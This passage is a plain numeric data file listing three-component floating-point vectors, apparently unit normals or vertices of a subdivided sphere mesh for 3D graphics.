[-0.722495436668,-0.687358558178,-0.0744211226702],
[-0.634539365768,-0.772890508175,0.0],
[-0.68142670393,-0.730884253979,-0.0382858961821],
[-0.68142670393,-0.730884253979,0.0382858961821],
[-0.436200261116,-0.830415487289,0.346611320972],
[-0.380723625422,-0.869839549065,0.313733518124],
[-0.446935534477,-0.85085272789,0.276221334934],
[-0.3044308424,-0.857896447182,0.413926929235],
[-0.246351331472,-0.891307473183,0.380633711815],
[-0.313436716795,-0.883275330067,0.348686188459],
[-0.321246802807,-0.905284404755,0.277958005667],
[-0.258633822203,-0.935745954514,0.239766731858],
[-0.327503234148,-0.922915279865,0.202408134937],
[-0.313436716795,-0.883275330067,0.348686188459],
[-0.321246802807,-0.905284404755,0.277958005667],
[-0.380723625422,-0.869839549065,0.313733518124],
[-0.174905076623,-0.866019308567,0.468421578407],
[-0.117213711143,-0.892938017845,0.434652328491],
[-0.180623859167,-0.894335091114,0.409316182137],
[-0.0549761541188,-0.858619451523,0.509656965733],
[0.0,-0.8796184659,0.475679844618],
[-0.0568443164229,-0.887796461582,0.456712335348],
[-0.0586068555713,-0.915323853493,0.398431301117],
[0.0,-0.932827115059,0.360324263573],
[-0.0602079555392,-0.940329909325,0.334895044565],
[-0.0568443164229,-0.887796461582,0.456712335348],
[-0.0586068555713,-0.915323853493,0.398431301117],
[-0.117213711143,-0.892938017845,0.434652328491],
[-0.193975359201,-0.960443258286,0.199805602431],
[-0.128498718143,-0.978907585144,0.158833146095],
[-0.196501940489,-0.97295331955,0.121444880962],
[-0.0615878328681,-0.961880862713,0.266443610191],
[0.0,-0.974178731441,0.225778326392],
[-0.0626873448491,-0.979053080082,0.193714544177],
[-0.0634539350867,-0.991025745869,0.117650069296],
[0.0,-0.997029185295,0.0770247355103],
[-0.0638479366899,-0.997179210186,0.0394601933658],
[-0.0626873448491,-0.979053080082,0.193714544177],
[-0.0634539350867,-0.991025745869,0.117650069296],
[-0.128498718143,-0.978907585144,0.158833146095],
[-0.180623859167,-0.894335091114,0.409316182137],
[-0.185843646526,-0.920180141926,0.34457308054],
[-0.246351331472,-0.891307473183,0.380633711815],
[-0.0602079555392,-0.940329909325,0.334895044565],
[-0.0615878328681,-0.961880862713,0.266443610191],
[-0.123895764351,-0.943842172623,0.306287169456],
[-0.190361812711,-0.942551255226,0.274516820908],
[-0.193975359201,-0.960443258286,0.199805602431],
[-0.258633822203,-0.935745954514,0.239766731858],
[-0.123895764351,-0.943842172623,0.306287169456],
[-0.190361812711,-0.942551255226,0.274516820908],
[-0.185843646526,-0.920180141926,0.34457308054],
[-0.446935534477,-0.85085272789,-0.276221334934],
[-0.380723625422,-0.869839549065,-0.313733518124],
[-0.436200261116,-0.830415487289,-0.346611320972],
[-0.327503234148,-0.922915279865,-0.202408134937],
[-0.258633822203,-0.935745954514,-0.239766731858],
[-0.321246802807,-0.905284404755,-0.277958005667],
[-0.313436716795,-0.883275330067,-0.348686188459],
[-0.246351331472,-0.891307473183,-0.380633711815],
[-0.3044308424,-0.857896447182,-0.413926929235],
[-0.321246802807,-0.905284404755,-0.277958005667],
[-0.313436716795,-0.883275330067,-0.348686188459],
[-0.380723625422,-0.869839549065,-0.313733518124],
[-0.196501940489,-0.97295331955,-0.121444880962],
[-0.128498718143,-0.978907585144,-0.158833146095],
[-0.193975359201,-0.960443258286,-0.199805602431],
[-0.0638479366899,-0.997179210186,-0.0394601933658],
[0.0,-0.997029185295,-0.0770247355103],
[-0.0634539350867,-0.991025745869,-0.117650069296],
[-0.0626873448491,-0.979053080082,-0.193714544177],
[0.0,-0.974178731441,-0.225778326392],
[-0.0615878328681,-0.961880862713,-0.266443610191],
[-0.0634539350867,-0.991025745869,-0.117650069296],
[-0.0626873448491,-0.979053080082,-0.193714544177],
[-0.128498718143,-0.978907585144,-0.158833146095],
[-0.180623859167,-0.894335091114,-0.409316182137],
[-0.117213711143,-0.892938017845,-0.434652328491],
[-0.174905076623,-0.866019308567,-0.468421578407],
[-0.0602079555392,-0.940329909325,-0.334895044565],
[0.0,-0.932827115059,-0.360324263573],
[-0.0586068555713,-0.915323853493,-0.398431301117],
[-0.0568443164229,-0.887796461582,-0.456712335348],
[0.0,-0.8796184659,-0.475679844618],
[-0.0549761541188,-0.858619451523,-0.509656965733],
[-0.0586068555713,-0.915323853493,-0.398431301117],
[-0.0568443164229,-0.887796461582,-0.456712335348],
[-0.117213711143,-0.892938017845,-0.434652328491],
[-0.193975359201,-0.960443258286,-0.199805602431],
[-0.190361812711,-0.942551255226,-0.274516820908],
[-0.258633822203,-0.935745954514,-0.239766731858],
[-0.0615878328681,-0.961880862713,-0.266443610191],
[-0.0602079555392,-0.940329909325,-0.334895044565],
[-0.123895764351,-0.943842172623,-0.306287169456],
[-0.185843646526,-0.920180141926,-0.34457308054],
[-0.180623859167,-0.894335091114,-0.409316182137],
[-0.246351331472,-0.891307473183,-0.380633711815],
[-0.123895764351,-0.943842172623,-0.306287169456],
[-0.185843646526,-0.920180141926,-0.34457308054],
[-0.190361812711,-0.942551255226,-0.274516820908],
[-0.446935534477,-0.85085272789,0.276221334934],
[-0.455528259277,-0.867211103439,0.20109423995],
[-0.510783493519,-0.826465010643,0.236761152744],
[-0.327503234148,-0.922915279865,0.202408134937],
[-0.33188316226,-0.935258030891,0.123069040477],
[-0.395605653524,-0.903840482235,0.162998497486],
[-0.461539924145,-0.878655850887,0.122248865664],
[-0.464636415243,-0.88455080986,0.0410230122507],
[-0.524005174637,-0.847858190536,0.0809632539749],
[-0.395605653524,-0.903840482235,0.162998497486],
[-0.461539924145,-0.878655850887,0.122248865664],
[-0.455528259277,-0.867211103439,0.20109423995],
[-0.196501940489,-0.97295331955,0.121444880962],
[-0.197802826762,-0.979394435883,0.0407496243715],
[-0.265506535769,-0.960611641407,0.0820460245013],
[-0.0638479366899,-0.997179210186,0.0394601933658],
[-0.0638479366899,-0.997179210186,-0.0394601933658],
[-0.130150929093,-0.991494178772,0.0],
[-0.197802826762,-0.979394435883,-0.0407496243715],
[-0.196501940489,-0.97295331955,-0.121444880962],
[-0.265506535769,-0.960611641407,-0.0820460245013],
[-0.130150929093,-0.991494178772,0.0],
[-0.197802826762,-0.979394435883,-0.0407496243715],
[-0.197802826762,-0.979394435883,0.0407496243715],
[-0.464636415243,-0.88455080986,-0.0410230122507],
[-0.461539924145,-0.878655850887,-0.122248865664],
[-0.524005174637,-0.847858190536,-0.0809632539749],
[-0.33188316226,-0.935258030891,-0.123069040477],
[-0.327503234148,-0.922915279865,-0.202408134937],
[-0.395605653524,-0.903840482235,-0.162998497486],
[-0.455528259277,-0.867211103439,-0.20109423995],
[-0.446935534477,-0.85085272789,-0.276221334934],
[-0.510783493519,-0.826465010643,-0.236761152744],
[-0.395605653524,-0.903840482235,-0.162998497486],
[-0.455528259277,-0.867211103439,-0.20109423995],
[-0.461539924145,-0.878655850887,-0.122248865664],
[-0.265506535769,-0.960611641407,0.0820460245013],
[-0.334140062332,-0.941618084908,0.04130198434],
[-0.33188316226,-0.935258030891,0.123069040477],
[-0.265506535769,-0.960611641407,-0.0820460245013],
[-0.33188316226,-0.935258030891,-0.123069040477],
[-0.334140062332,-0.941618084908,-0.04130198434],
[-0.400968074799,-0.916092038155,0.0],
[-0.464636415243,-0.88455080986,-0.0410230122507],
[-0.464636415243,-0.88455080986,0.0410230122507],
[-0.334140062332,-0.941618084908,-0.04130198434],
[-0.400968074799,-0.916092038155,0.0],
[-0.334140062332,-0.941618084908,0.04130198434],
[-0.509656965733,-0.0549761541188,0.858619451523],
[-0.548688352108,-0.091976031661,0.830952167511],
[-0.564633131027,-0.0339771322906,0.82464236021],
[-0.468421578407,-0.174905076623,0.866019308567],
[-0.506734728813,-0.217834427953,0.834127128124],
[-0.529480218887,-0.153434738517,0.834331154823],
[-0.588087081909,-0.131048902869,0.798110127449],
[-0.627150595188,-0.171839639544,0.759706020355],
[-0.643326640129,-0.108097285032,0.757922053337],
[-0.529480218887,-0.153434738517,0.834331154823],
[-0.588087081909,-0.131048902869,0.798110127449],
[-0.548688352108,-0.091976031661,0.830952167511],
[-0.413926929235,-0.3044308424,0.857896447182],
[-0.450116455555,-0.352179646492,0.820587992668],
[-0.480284929276,-0.284414708614,0.829719662666],
[-0.346611320972,-0.436200261116,0.830415487289],
[-0.379529476166,-0.486395716667,0.787004828453],
[-0.416404157877,-0.419940322638,0.806385576725],
[-0.485873311758,-0.400663375854,0.776785671711],
[-0.520354926586,-0.44894811511,0.726413309574],
[-0.553625464439,-0.378517180681,0.74177056551],
[-0.416404157877,-0.419940322638,0.806385576725],
[-0.485873311758,-0.400663375854,0.776785671711],
[-0.450116455555,-0.352179646492,0.820587992668],
[-0.665048420429,-0.213841319084,0.715529501438],
[-0.700865805149,-0.256401896477,0.665616393089],
[-0.718357801437,-0.188148602843,0.669747889042],
[-0.618283927441,-0.353819847107,0.701809465885],
[-0.65135627985,-0.398910075426,0.645450055599],
[-0.678621411324,-0.327040165663,0.657660841942],
[-0.733673810959,-0.298754066229,0.610302150249],
[-0.762617051601,-0.340069264174,0.550243675709],
[-0.782811582088,-0.269586592913,0.560828924179],
[-0.678621411324,-0.327040165663,0.657660841942],
[-0.733673810959,-0.298754066229,0.610302150249],
[-0.700865805149,-0.256401896477,0.665616393089],
[-0.480284929276,-0.284414708614,0.829719662666],
[-0.545040607452,-0.26241543889,0.796284377575],
[-0.506734728813,-0.217834427953,0.834127128124],
[-0.553625464439,-0.378517180681,0.74177056551],
[-0.618283927441,-0.353819847107,0.701809465885],
[-0.582528710365,-0.308011889458,0.752189457417],
[-0.606988489628,-0.238753452897,0.757998526096],
[-0.665048420429,-0.213841319084,0.715529501438],
[-0.627150595188,-0.171839639544,0.759706020355],
[-0.582528710365,-0.308011889458,0.752189457417],
[-0.606988489628,-0.238753452897,0.757998526096],
[-0.545040607452,-0.26241543889,0.796284377575],
[-0.269586592913,-0.560828924179,0.782811582088],
[-0.298754066229,-0.610302150249,0.733673810959],
[-0.340069264174,-0.550243675709,0.762617051601],
[-0.188148602843,-0.669747889042,0.718357801437],
[-0.213841319084,-0.715529501438,0.665048420429],
[-0.256401896477,-0.665616393089,0.700865805149],
[-0.327040165663,-0.657660841942,0.678621411324],
[-0.353819847107,-0.701809465885,0.618283927441],
[-0.398910075426,-0.645450055599,0.65135627985],
[-0.256401896477,-0.665616393089,0.700865805149],
[-0.327040165663,-0.657660841942,0.678621411324],
[-0.298754066229,-0.610302150249,0.733673810959],
[-0.108097285032,-0.757922053337,0.643326640129],
[-0.131048902869,-0.798110127449,0.588087081909],
[-0.171839639544,-0.759706020355,0.627150595188],
[-0.0339771322906,-0.82464236021,0.564633131027],
[-0.0549761541188,-0.858619451523,0.509656965733],
[-0.091976031661,-0.830952167511,0.548688352108],
[-0.153434738517,-0.834331154823,0.529480218887],
[-0.174905076623,-0.866019308567,0.468421578407],
[-0.217834427953,-0.834127128124,0.506734728813],
[-0.091976031661,-0.830952167511,0.548688352108],
[-0.153434738517,-0.834331154823,0.529480218887],
[-0.131048902869,-0.798110127449,0.588087081909],
[-0.378517180681,-0.74177056551,0.553625464439],
[-0.400663375854,-0.776785671711,0.485873311758],
[-0.44894811511,-0.726413309574,0.520354926586],
[-0.284414708614,-0.829719662666,0.480284929276],
[-0.3044308424,-0.857896447182,0.413926929235],
[-0.352179646492,-0.820587992668,0.450116455555],
[-0.419940322638,-0.806385576725,0.416404157877],
[-0.436200261116,-0.830415487289,0.346611320972],
[-0.486395716667,-0.787004828453,0.379529476166],
[-0.352179646492,-0.820587992668,0.450116455555],
[-0.419940322638,-0.806385576725,0.416404157877],
[-0.400663375854,-0.776785671711,0.485873311758],
[-0.171839639544,-0.759706020355,0.627150595188],
[-0.238753452897,-0.757998526096,0.606988489628],
[-0.213841319084,-0.715529501438,0.665048420429],
[-0.217834427953,-0.834127128124,0.506734728813],
[-0.284414708614,-0.829719662666,0.480284929276],
[-0.26241543889,-0.796284377575,0.545040607452],
[-0.308011889458,-0.752189457417,0.582528710365],
[-0.378517180681,-0.74177056551,0.553625464439],
[-0.353819847107,-0.701809465885,0.618283927441],
[-0.26241543889,-0.796284377575,0.545040607452],
[-0.308011889458,-0.752189457417,0.582528710365],
[-0.238753452897,-0.757998526096,0.606988489628],
[-0.787004828453,-0.379529476166,0.486395716667],
[-0.806385576725,-0.416404157877,0.419940322638],
[-0.830415487289,-0.346611320972,0.436200261116],
[-0.726413309574,-0.520354926586,0.44894811511],
[-0.74177056551,-0.553625464439,0.378517180681],
[-0.776785671711,-0.485873311758,0.400663375854],
[-0.820587992668,-0.450116455555,0.352179646492],
[-0.829719662666,-0.480284929276,0.284414708614],
[-0.857896447182,-0.413926929235,0.3044308424],
[-0.776785671711,-0.485873311758,0.400663375854],
[-0.820587992668,-0.450116455555,0.352179646492],
[-0.806385576725,-0.416404157877,0.419940322638],
[-0.645450055599,-0.65135627985,0.398910075426],
[-0.657660841942,-0.678621411324,0.327040165663],
[-0.701809465885,-0.618283927441,0.353819847107],
[-0.550243675709,-0.762617051601,0.340069264174],
[-0.560828924179,-0.782811582088,0.269586592913],
[-0.610302150249,-0.733673810959,0.298754066229],
[-0.665616393089,-0.700865805149,0.256401896477],
[-0.669747889042,-0.718357801437,0.188148602843],
[-0.715529501438,-0.665048420429,0.213841319084],
[-0.610302150249,-0.733673810959,0.298754066229],
[-0.665616393089,-0.700865805149,0.256401896477],
[-0.657660841942,-0.678621411324,0.327040165663],
[-0.834127128124,-0.506734728813,0.217834427953],
[-0.834331154823,-0.529480218887,0.153434738517],
[-0.866019308567,-0.468421578407,0.174905076623],
[-0.759706020355,-0.627150595188,0.171839639544],
[-0.757922053337,-0.643326640129,0.108097285032],
[-0.798110127449,-0.588087081909,0.131048902869],
[-0.830952167511,-0.548688352108,0.091976031661],
[-0.82464236021,-0.564633131027,0.0339771322906],
[-0.858619451523,-0.509656965733,0.0549761541188],
[-0.798110127449,-0.588087081909,0.131048902869],
[-0.830952167511,-0.548688352108,0.091976031661],
[-0.834331154823,-0.529480218887,0.153434738517],
[-0.701809465885,-0.618283927441,0.353819847107],
[-0.752189457417,-0.582528710365,0.308011889458],
[-0.74177056551,-0.553625464439,0.378517180681],
[-0.715529501438,-0.665048420429,0.213841319084],
[-0.759706020355,-0.627150595188,0.171839639544],
[-0.757998526096,-0.606988489628,0.238753452897],
[-0.796284377575,-0.545040607452,0.26241543889],
[-0.834127128124,-0.506734728813,0.217834427953],
[-0.829719662666,-0.480284929276,0.284414708614],
[-0.757998526096,-0.606988489628,0.238753452897],
[-0.796284377575,-0.545040607452,0.26241543889],
[-0.752189457417,-0.582528710365,0.308011889458],
[-0.340069264174,-0.550243675709,0.762617051601],
[-0.411682873964,-0.535965919495,0.737060189247],
[-0.379529476166,-0.486395716667,0.787004828453],
[-0.398910075426,-0.645450055599,0.65135627985],
[-0.470621615648,-0.628728508949,0.619044244289],
[-0.44230055809,-0.58378881216,0.680853009224],
[-0.483050197363,-0.517854511738,0.706037700176],
[-0.552667617798,-0.495975226164,0.669751524925],
[-0.520354926586,-0.44894811511,0.726413309574],
[-0.44230055809,-0.58378881216,0.680853009224],
[-0.483050197363,-0.517854511738,0.706037700176],
[-0.411682873964,-0.535965919495,0.737060189247],
[-0.44894811511,-0.726413309574,0.520354926586],
[-0.517854511738,-0.706037700176,0.483050197363],
[-0.495975226164,-0.669751524925,0.552667617798],
[-0.486395716667,-0.787004828453,0.379529476166],
[-0.550243675709,-0.762617051601,0.340069264174],
[-0.535965919495,-0.737060189247,0.411682873964],
[-0.58378881216,-0.680853009224,0.44230055809],
[-0.645450055599,-0.65135627985,0.398910075426],
[-0.628728508949,-0.619044244289,0.470621615648],
[-0.535965919495,-0.737060189247,0.411682873964],
[-0.58378881216,-0.680853009224,0.44230055809],
[-0.517854511738,-0.706037700176,0.483050197363],
[-0.619044244289,-0.470621615648,0.628728508949],
[-0.680853009224,-0.44230055809,0.58378881216],
[-0.65135627985,-0.398910075426,0.645450055599],
[-0.669751524925,-0.552667617798,0.495975226164],
[-0.726413309574,-0.520354926586,0.44894811511],
[-0.706037700176,-0.483050197363,0.517854511738],
[-0.737060189247,-0.411682873964,0.535965919495],
[-0.787004828453,-0.379529476166,0.486395716667],
[-0.762617051601,-0.340069264174,0.550243675709],
[-0.706037700176,-0.483050197363,0.517854511738],
[-0.737060189247,-0.411682873964,0.535965919495],
[-0.680853009224,-0.44230055809,0.58378881216],
[-0.495975226164,-0.669751524925,0.552667617798],
[-0.540649950504,-0.607478022575,0.581951975822],
[-0.470621615648,-0.628728508949,0.619044244289],
[-0.628728508949,-0.619044244289,0.470621615648],
[-0.669751524925,-0.552667617798,0.495975226164],
[-0.607478022575,-0.581951975822,0.540649950504],
[-0.581951975822,-0.540649950504,0.607478022575],
[-0.619044244289,-0.470621615648,0.628728508949],
[-0.552667617798,-0.495975226164,0.669751524925],
[-0.607478022575,-0.581951975822,0.540649950504],
[-0.581951975822,-0.540649950504,0.607478022575],
[-0.540649950504,-0.607478022575,0.581951975822],
[-0.0339771322906,-0.82464236021,0.564633131027],
[0.0,-0.79582041502,0.605532705784],
[0.0339771322906,-0.82464236021,0.564633131027],
[-0.108097285032,-0.757922053337,0.643326640129],
[-0.0744211226702,-0.722495436668,0.687358558178],
[-0.0362210273743,-0.761889100075,0.646693944931],
[0.0362210273743,-0.761889100075,0.646693944931],
[0.0744211226702,-0.722495436668,0.687358558178],
[0.108097285032,-0.757922053337,0.643326640129],
[-0.0362210273743,-0.761889100075,0.646693944931],
[0.0362210273743,-0.761889100075,0.646693944931],
[0.0,-0.79582041502,0.605532705784],
[-0.188148602843,-0.669747889042,0.718357801437],
[-0.154971644282,-0.62687343359,0.763553202152],
[-0.114190116525,-0.677466154099,0.726636230946],
[-0.269586592913,-0.560828924179,0.782811582088],
[-0.236761152744,-0.510783493519,0.826465010643],
[-0.196083456278,-0.571085453033,0.797127783298],
[-0.119124859571,-0.578244268894,0.807120084763],
[-0.0809632539749,-0.524005174637,0.847858190536],
[-0.0399611219764,-0.581926107407,0.81225925684],
[-0.196083456278,-0.571085453033,0.797127783298],
[-0.119124859571,-0.578244268894,0.807120084763],
[-0.154971644282,-0.62687343359,0.763553202152],
[0.114190116525,-0.677466154099,0.726636230946],
[0.154971644282,-0.62687343359,0.763553202152],
[0.188148602843,-0.669747889042,0.718357801437],
[0.0399611219764,-0.581926107407,0.81225925684],
[0.0809632539749,-0.524005174637,0.847858190536],
[0.119124859571,-0.578244268894,0.807120084763],
[0.196083456278,-0.571085453033,0.797127783298],
[0.236761152744,-0.510783493519,0.826465010643],
[0.269586592913,-0.560828924179,0.782811582088],
[0.119124859571,-0.578244268894,0.807120084763],
[0.196083456278,-0.571085453033,0.797127783298],
[0.154971644282,-0.62687343359,0.763553202152],
[-0.114190116525,-0.677466154099,0.726636230946],
[-0.0382858961821,-0.68142670393,0.730884253979],
[-0.0744211226702,-0.722495436668,0.687358558178],
[-0.0399611219764,-0.581926107407,0.81225925684],
[0.0399611219764,-0.581926107407,0.81225925684],
[0.0,-0.634539365768,0.772890508175],
[0.0382858961821,-0.68142670393,0.730884253979],
[0.114190116525,-0.677466154099,0.726636230946],
[0.0744211226702,-0.722495436668,0.687358558178],
[0.0,-0.634539365768,0.772890508175],
[0.0382858961821,-0.68142670393,0.730884253979],
[-0.0382858961821,-0.68142670393,0.730884253979],
[-0.346611320972,-0.436200261116,0.830415487289],
[-0.313733518124,-0.380723625422,0.869839549065],
[-0.276221334934,-0.446935534477,0.85085272789],
[-0.413926929235,-0.3044308424,0.857896447182],
[-0.380633711815,-0.246351331472,0.891307473183],
[-0.348686188459,-0.313436716795,0.883275330067],
[-0.277958005667,-0.321246802807,0.905284404755],
[-0.239766731858,-0.258633822203,0.935745954514],
[-0.202408134937,-0.327503234148,0.922915279865],
[-0.348686188459,-0.313436716795,0.883275330067],
[-0.277958005667,-0.321246802807,0.905284404755],
[-0.313733518124,-0.380723625422,0.869839549065],
[-0.468421578407,-0.174905076623,0.866019308567],
[-0.434652328491,-0.117213711143,0.892938017845],
[-0.409316182137,-0.180623859167,0.894335091114],
[-0.509656965733,-0.0549761541188,0.858619451523],
[-0.475679844618,0.0,0.8796184659],
[-0.456712335348,-0.0568443164229,0.887796461582],
[-0.398431301117,-0.0586068555713,0.915323853493],
[-0.360324263573,0.0,0.932827115059],
[-0.334895044565,-0.0602079555392,0.940329909325],
[-0.456712335348,-0.0568443164229,0.887796461582],
[-0.398431301117,-0.0586068555713,0.915323853493],
[-0.434652328491,-0.117213711143,0.892938017845],
[-0.199805602431,-0.193975359201,0.960443258286],
[-0.158833146095,-0.128498718143,0.978907585144],
[-0.121444880962,-0.196501940489,0.97295331955],
[-0.266443610191,-0.0615878328681,0.961880862713],
[-0.225778326392,0.0,0.974178731441],
[-0.193714544177,-0.0626873448491,0.979053080082],
[-0.117650069296,-0.0634539350867,0.991025745869],
[-0.0770247355103,0.0,0.997029185295],
[-0.0394601933658,-0.0638479366899,0.997179210186],
[-0.193714544177,-0.0626873448491,0.979053080082],
[-0.117650069296,-0.0634539350867,0.991025745869],
[-0.158833146095,-0.128498718143,0.978907585144],
[-0.409316182137,-0.180623859167,0.894335091114],
[-0.34457308054,-0.185843646526,0.920180141926],
[-0.380633711815,-0.246351331472,0.891307473183],
[-0.334895044565,-0.0602079555392,0.940329909325],
[-0.266443610191,-0.0615878328681,0.961880862713],
[-0.306287169456,-0.123895764351,0.943842172623],
[-0.274516820908,-0.190361812711,0.942551255226],
[-0.199805602431,-0.193975359201,0.960443258286],
[-0.239766731858,-0.258633822203,0.935745954514],
[-0.306287169456,-0.123895764351,0.943842172623],
[-0.274516820908,-0.190361812711,0.942551255226],
[-0.34457308054,-0.185843646526,0.920180141926],
[0.276221334934,-0.446935534477,0.85085272789],
[0.313733518124,-0.380723625422,0.869839549065],
[0.346611320972,-0.436200261116,0.830415487289],
[0.202408134937,-0.327503234148,0.922915279865],
[0.239766731858,-0.258633822203,0.935745954514],
[0.277958005667,-0.321246802807,0.905284404755],
[0.348686188459,-0.313436716795,0.883275330067],
[0.380633711815,-0.246351331472,0.891307473183],
[0.413926929235,-0.3044308424,0.857896447182],
[0.277958005667,-0.321246802807,0.905284404755],
[0.348686188459,-0.313436716795,0.883275330067],
[0.313733518124,-0.380723625422,0.869839549065],
[0.121444880962,-0.196501940489,0.97295331955],
[0.158833146095,-0.128498718143,0.978907585144],
[0.199805602431,-0.193975359201,0.960443258286],
[0.0394601933658,-0.0638479366899,0.997179210186],
[0.0770247355103,0.0,0.997029185295],
[0.117650069296,-0.0634539350867,0.991025745869],
[0.193714544177,-0.0626873448491,0.979053080082],
[0.225778326392,0.0,0.974178731441],
[0.266443610191,-0.0615878328681,0.961880862713],
[0.117650069296,-0.0634539350867,0.991025745869],
[0.193714544177,-0.0626873448491,0.979053080082],
[0.158833146095,-0.128498718143,0.978907585144],
[0.409316182137,-0.180623859167,0.894335091114],
[0.434652328491,-0.117213711143,0.892938017845],
[0.468421578407,-0.174905076623,0.866019308567],
[0.334895044565,-0.0602079555392,0.940329909325],
[0.360324263573,0.0,0.932827115059],
[0.398431301117,-0.0586068555713,0.915323853493],
[0.456712335348,-0.0568443164229,0.887796461582],
[0.475679844618,0.0,0.8796184659],
[0.509656965733,-0.0549761541188,0.858619451523],
[0.398431301117,-0.0586068555713,0.915323853493],
[0.456712335348,-0.0568443164229,0.887796461582],
[0.434652328491,-0.117213711143,0.892938017845],
[0.199805602431,-0.193975359201,0.960443258286],
[0.274516820908,-0.190361812711,0.942551255226],
[0.239766731858,-0.258633822203,0.935745954514],
[0.266443610191,-0.0615878328681,0.961880862713],
[0.334895044565,-0.0602079555392,0.940329909325],
[0.306287169456,-0.123895764351,0.943842172623],
[0.34457308054,-0.185843646526,0.920180141926],
[0.409316182137,-0.180623859167,0.894335091114],
[0.380633711815,-0.246351331472,0.891307473183],
[0.306287169456,-0.123895764351,0.943842172623],
[0.34457308054,-0.185843646526,0.920180141926],
[0.274516820908,-0.190361812711,0.942551255226],
[-0.276221334934,-0.446935534477,0.85085272789],
[-0.20109423995,-0.455528259277,0.867211103439],
[-0.236761152744,-0.510783493519,0.826465010643],
[-0.202408134937,-0.327503234148,0.922915279865],
[-0.123069040477,-0.33188316226,0.935258030891],
[-0.162998497486,-0.395605653524,0.903840482235],
[-0.122248865664,-0.461539924145,0.878655850887],
[-0.0410230122507,-0.464636415243,0.88455080986],
[-0.0809632539749,-0.524005174637,0.847858190536],
[-0.162998497486,-0.395605653524,0.903840482235],
[-0.122248865664,-0.461539924145,0.878655850887],
[-0.20109423995,-0.455528259277,0.867211103439],
[-0.121444880962,-0.196501940489,0.97295331955],
[-0.0407496243715,-0.197802826762,0.979394435883],
[-0.0820460245013,-0.265506535769,0.960611641407],
[-0.0394601933658,-0.0638479366899,0.997179210186],
[0.0394601933658,-0.0638479366899,0.997179210186],
[0.0,-0.130150929093,0.991494178772],
[0.0407496243715,-0.197802826762,0.979394435883],
[0.121444880962,-0.196501940489,0.97295331955],
[0.0820460245013,-0.265506535769,0.960611641407],
[0.0,-0.130150929093,0.991494178772],
[0.0407496243715,-0.197802826762,0.979394435883],
[-0.0407496243715,-0.197802826762,0.979394435883],
[0.0410230122507,-0.464636415243,0.88455080986],
[0.122248865664,-0.461539924145,0.878655850887],
[0.0809632539749,-0.524005174637,0.847858190536],
[0.123069040477,-0.33188316226,0.935258030891],
[0.202408134937,-0.327503234148,0.922915279865],
[0.162998497486,-0.395605653524,0.903840482235],
[0.20109423995,-0.455528259277,0.867211103439],
[0.276221334934,-0.446935534477,0.85085272789],
[0.236761152744,-0.510783493519,0.826465010643],
[0.162998497486,-0.395605653524,0.903840482235],
[0.20109423995,-0.455528259277,0.867211103439],
[0.122248865664,-0.461539924145,0.878655850887],
[-0.0820460245013,-0.265506535769,0.960611641407],
[-0.04130198434,-0.334140062332,0.941618084908],
[-0.123069040477,-0.33188316226,0.935258030891],
[0.0820460245013,-0.265506535769,0.960611641407],
[0.123069040477,-0.33188316226,0.935258030891],
[0.04130198434,-0.334140062332,0.941618084908],
[0.0,-0.400968074799,0.916092038155],
[0.0410230122507,-0.464636415243,0.88455080986],
[-0.0410230122507,-0.464636415243,0.88455080986],
[0.04130198434,-0.334140062332,0.941618084908],
[0.0,-0.400968074799,0.916092038155],
[-0.04130198434,-0.334140062332,0.941618084908],
[0.0339771322906,-0.82464236021,0.564633131027],
[0.091976031661,-0.830952167511,0.548688352108],
[0.0549761541188,-0.858619451523,0.509656965733],
[0.108097285032,-0.757922053337,0.643326640129],
[0.171839639544,-0.759706020355,0.627150595188],
[0.131048902869,-0.798110127449,0.588087081909],
[0.153434738517,-0.834331154823,0.529480218887],
[0.217834427953,-0.834127128124,0.506734728813],
[0.174905076623,-0.866019308567,0.468421578407],
[0.131048902869,-0.798110127449,0.588087081909],
[0.153434738517,-0.834331154823,0.529480218887],
[0.091976031661,-0.830952167511,0.548688352108],
[0.188148602843,-0.669747889042,0.718357801437],
[0.256401896477,-0.665616393089,0.700865805149],
[0.213841319084,-0.715529501438,0.665048420429],
[0.269586592913,-0.560828924179,0.782811582088],
[0.340069264174,-0.550243675709,0.762617051601],
[0.298754066229,-0.610302150249,0.733673810959],
[0.327040165663,-0.657660841942,0.678621411324],
[0.398910075426,-0.645450055599,0.65135627985],
[0.353819847107,-0.701809465885,0.618283927441],
[0.298754066229,-0.610302150249,0.733673810959],
[0.327040165663,-0.657660841942,0.678621411324],
[0.256401896477,-0.665616393089,0.700865805149],
[0.284414708614,-0.829719662666,0.480284929276],
[0.352179646492,-0.820587992668,0.450116455555],
[0.3044308424,-0.857896447182,0.413926929235],
[0.378517180681,-0.74177056551,0.553625464439],
[0.44894811511,-0.726413309574,0.520354926586],
[0.400663375854,-0.776785671711,0.485873311758],
[0.419940322638,-0.806385576725,0.416404157877],
[0.486395716667,-0.787004828453,0.379529476166],
[0.436200261116,-0.830415487289,0.346611320972],
[0.400663375854,-0.776785671711,0.485873311758],
[0.419940322638,-0.806385576725,0.416404157877],
[0.352179646492,-0.820587992668,0.450116455555],
[0.213841319084,-0.715529501438,0.665048420429],
[0.238753452897,-0.757998526096,0.606988489628],
[0.171839639544,-0.759706020355,0.627150595188],
[0.353819847107,-0.701809465885,0.618283927441],
[0.378517180681,-0.74177056551,0.553625464439],
[0.308011889458,-0.752189457417,0.582528710365],
[0.26241543889,-0.796284377575,0.545040607452],
[0.284414708614,-0.829719662666,0.480284929276],
[0.217834427953,-0.834127128124,0.506734728813],
[0.308011889458,-0.752189457417,0.582528710365],
[0.26241543889,-0.796284377575,0.545040607452],
[0.238753452897,-0.757998526096,0.606988489628],
[0.346611320972,-0.436200261116,0.830415487289],
[0.416404157877,-0.419940322638,0.806385576725],
[0.379529476166,-0.486395716667,0.787004828453],
[0.413926929235,-0.3044308424,0.857896447182],
[0.480284929276,-0.284414708614,0.829719662666],
[0.450116455555,-0.352179646492,0.820587992668],
[0.485873311758,-0.400663375854,0.776785671711],
[0.553625464439,-0.378517180681,0.74177056551],
[0.520354926586,-0.44894811511,0.726413309574],
[0.450116455555,-0.352179646492,0.820587992668],
[0.485873311758,-0.400663375854,0.776785671711],
[0.416404157877,-0.419940322638,0.806385576725],
[0.468421578407,-0.174905076623,0.866019308567],
[0.529480218887,-0.153434738517,0.834331154823],
[0.506734728813,-0.217834427953,0.834127128124],
[0.509656965733,-0.0549761541188,0.858619451523],
[0.564633131027,-0.0339771322906,0.82464236021],
[0.548688352108,-0.091976031661,0.830952167511],
[0.588087081909,-0.131048902869,0.798110127449],
[0.643326640129,-0.108097285032,0.757922053337],
[0.627150595188,-0.171839639544,0.759706020355],
[0.548688352108,-0.091976031661,0.830952167511],
